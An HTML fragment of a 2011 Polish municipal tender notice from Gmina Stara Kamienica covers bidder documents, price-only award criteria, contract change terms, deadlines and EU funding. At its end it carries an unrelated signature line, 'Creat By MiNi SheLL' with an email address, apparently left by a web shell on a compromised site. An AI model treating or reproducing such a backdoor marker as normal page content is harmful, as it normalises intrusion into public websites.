<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje możliwość zmiany zawartej  umowy w przypadku :

a)	zmiany kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu zamówienia na osobę (y) spełniającą (e) co najmniej warunki podmiotowe określone w 
Cz.I. IDW, zmiana lub konieczność  dodatkowego wprowadzenia na plac budowy - podwykonawcy,
b)	rezygnacji z wykonania pełnego zakresu rzeczowego objętego zamówieniem w przypadku zaistnienia  okoliczności, w których zbędne będzie wykonanie danej części zamówienia , wraz      z jednoczesnym związanym z tym obniżeniem wynagrodzenia, w oparciu o dostarczony kosztorys ofertowy  przed podpisaniem umowy,   
c)	wprowadzenia robót zamiennych podczas realizacji umowy wynikających z rzeczywistych warunków występujących w trakcie realizacji prac - nie powodujących zmian  w wysokości umownej ceny wpisanej do umowy,
d)	zmiana zakresu rzeczowego umowy  w części niezbędnej do prawidłowego wykonania zamówienia, przy czym konieczna do wykonania praca nie stanowi zamówienia dodatkowego     w rozumieniu przepisów u.p.z.p. i spowoduje zmiany  w wysokości umownej ceny  wpisanej do umowy,
e)	wystąpienia wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających   
wykonanie robót zgodnie z zasadami wiedzy technicznej, obowiązującymi przepisami                    i warunkami technologicznymi określonymi dla robót, które miałyby być wykonane w tych warunkach;  konieczność zrealizowania zamówienia przy zastosowaniu innych rozwiązań 
technicznych, technologicznych lub materiałowych niż wskazane w Dokumentacji projektowej      w sytuacji, gdyby zastosowanie dotychczasowych rozwiązań groziło nie wykonaniem lub wadliwym  wykonaniem projektu - dotyczy  możliwości  wydłużenia terminu realizacji zakończenia i/lub zmiany wynagrodzenia na zasadzie  określonej w punkcie b).

2. Zmiany umowy nie wymaga: zmiana danych teleadresowych, zmiana osób wskazanych do   kontaktów między stronami umowy, zmiana danych związanych z obsługą administracyjno-organizacyjną umowy  (np. zmiana rachunku bankowego). 

3. O interpretacji zdarzenia _siły wyższej_ i ewentualnym uznaniu przedłużenia terminu wykonania robót  z tego powodu, będzie decydował Wójt Gminy Stara Kamienica , po złożeniu pisemnego wniosku Wykonawcy .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.stara-kamienica.bazagmin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nieodpłatnie -ze strony internetowej. w wersji papierowej- w ciagu 5 dni od daty zlożenia wniosku z dowodem wniesienia opłaty w wysokości 230 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2011 godzina 10:00, miejsce: za pośrednictwem np. operatora publicznego do siedziby Zamawiającego: Urząd Gminy Stara Kamienica, 58-512 Stara Kamienica 41 lub osobiście do sekretariatu Urzędu Gminy - I piętro ( adres j. w.)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach Programu Rozwoju Obszarów Wiejskich 2007-2013 przy dofinansowaniu środkami Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich _Europa Inwestująca w Obszary Wiejskie _.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com